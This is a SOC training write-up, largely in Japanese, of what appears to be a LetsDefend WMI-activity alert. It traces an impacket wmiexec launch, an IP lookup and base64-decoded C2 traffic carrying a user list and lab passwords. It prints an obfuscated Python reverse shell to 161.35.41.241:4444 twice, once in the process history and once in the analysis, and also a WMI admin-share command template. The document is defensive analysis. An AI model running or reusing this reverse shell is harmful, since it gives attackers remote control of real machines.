• Details
• Playbook
  • Define Threat Indicator
  • Check if the malware is quarantined/cleaned
    • Endpoint Security
      • 161.35.41.241
  • Analyze Malware
    • Connection to 161.35.41.241
      • 315
      • 316
      • 317
      • 318
    • 余談
  • Check If Someone Requested the C2
  • Containment
  • Add Artifacts
• End

Details

EventID: 71
Event Time: March 7, 2021, 4:50 p.m.
Rule: SOC134 - Suspicious WMI Activity
Level: Security Analyst
Source Address 172.16.17.54
Source Hostname Desktop-Anderson
File Name exec.bat
File Hash 50459310eded4c520ab5c9e3626a9300
File Size 52.00 B
Device Action Allowed
Download (Password:infected): 50459310eded4c520ab5c9e3626a9300.zip

Playbook

Define Threat Indicator

Answer: Other

Check if the malware is quarantined/cleaned

Endpoint Security

# Process History

AcroRd32.exe
MD5:357b03e0b8d0c30713f2c41ce60583c5
Path:c:/program files (x86)/adobe/acrobat reader dc/reader/acrord32.exe

Chrome.exe
MD5:E9CABAAACF0E50A55DF49698C0800D4B
Path:c:/program files (x86)/google/chrome/application/chrome.exe
Size:1.72 MB

ccsvchst.exe
MD5:aba0a9709e6c11bc0b6ee21de36743e3
Path:c:/program files (x86)/symantec/symantec endpoint protection/14/bin/ccsvchst.exe
Size:142.45 KB

notepad.exe
MD5:FC2EA5BD5307D2CFA5AAA38E0C0DDCE9
Size:216 KB
Path:c:/windows/system32/notepad.exe

iexplore.exe
MD5:b015ecd030da9a979e6d1a3d25f8fd8
Path:c:/program files/internet explorer/iexplore.exe

WmiPrvSE.exe
MD5:4fb491ac8d46aaf22ba8bc5c73dabef7
Path:C:/WINDOWS/System32/Wbem
Child Process:cmd.exe /Q /K C:/Python27/python.exe -c '(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('161.35.41.241', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['//windows//system32//cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))' /list 1> //127.0.0.1/ADMIN$/test.dat 2>&1

outlook.exe
MD5:BFE93F50474FDB27D70C47326C8B6051
Path:c:/program files (x86)/microsoft office/office15/outlook.exe
Size:18.11 MB
Start Time:2020-12-10 12:29

vmware-usbarbitrator64.exe
MD5:59C8BF1A8C9CBB6EC136DC7F7476250D
Path:c:/program files (x86)/common files/vmware/usb/vmware-usbarbitrator64.exe
Size:907.92 KB
Start Time:2020-09-22 09:10

services.exe
Path:c:/users/Anderson/desktop/services.exe
Size:2 MB
String1:go.buildid
String2:Go build ID:
String3:json:"pid"
String4:json:"key"
String5:json:"agent_time"
String6:json:"rid"
String7:json:"ports"
String8:json:"agent_platform"
String9:rat.New

WmiPrvSE.exeのChild Processがどうも怪しい。

161.35.41.241

VirusTotal: https://www.virustotal.com/gui/ip-address/161.35.41.241
AbuseIPDB: https://www.abuseipdb.com/check/161.35.41.241
ip-sc: https://ip-sc.net/ja/r/161.35.41.241
DigitalOceanのサーバ

Answer: Not Quarantined

Analyze Malware

まずは、そもそもalertで検知されたexec.batの確認を行う。

$ cat exec.bat 
python wmiexec.py LetsDefend/Administrator@127.0.0.1

先ほどのWmiPrvSE.exeのChild Processはexec.batによるものだろう。exec.batを見ても何が起きたか分からない。
wmieexec.pyはもしかしてこれかもしれない。
impacket/wmiexec.py at master · SecureAuthCorp/impacket · GitHub
WmiPrvSE.exeのChild Processと似たようなものでありそうだ。

cmd.exe /Q /K C:/Python27/python.exe -c '(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('161.35.41.241', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['//windows//system32//cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))' /list 1> //127.0.0.1/ADMIN$/test.dat 2>&1

これらはWMIを介してコマンド実行するもののようだ。
次に、161.35.41.241への接続をLogから確認する。

Connection to 161.35.41.241

315

content: aqlKZ7wjzg0iKM00E1WB/jq9_RA46w91EKl9A02Dv/nbNdZiLsB1ci8Ph0fb64/9Ks1YxAE86iz9A0dUiDl

316

data: hostname:DESKTOP-ANDERSON

base64: aG9zdG5hbWU6REVTS1RPUC1BTkRFUlNPTg== -> hostname:DESKTOP-ANDERSON

317

data: dXNlcnM6ClVzZXIgYWNjb3VudHMgZm9yIFxcREVTS1RPUC1BTkRFUlNPTgoKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgRGVmYXVsdEFjY291bnQgICAgICAgICAgIEd1ZXN0CkFuZGVyc29uICAgICAgICAgICAgICAgICAgICAKVGhlIGNvbW1hbmQgY29tcGxldGVkIHN1Y2Nlc3NmdWxseS4=

base64 decode ->

users:
User accounts for \\DESKTOP-ANDERSON

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
Anderson                    
The command completed successfully.

318

data: UGFzc2xpc3Q6CgpBbmRlcnNvbjphbmRlcjEyc29uIQpBZG1pbmlzdHJhdG9yOm15czNyM3RQQHNzIS4=

base64 decode ->

Passlist:

Anderson:ander12son!
Administrator:mys3r3tP@ss!.

WMIを介してコマンド実行でAdministratorの権限情報を手に入れた模様。

Answer: Malicious
ところで怪しいpythonコードがあったら動的解析のための無料サービスはないのだろうか。

余談

WMIを悪用するときはお決まりの形式?

cmd.exe /Q /c hostname 1> \127.0.0.1\ADMIN$\output.txt 2>&1
MITRE ATT&CK® Technique: Windows Admin Shares - Red Canary

Check If Someone Requested the C2

161.35.41.241への接続が確認できている。
Answer: Accessed

Containment

Containment!

Add Artifacts

End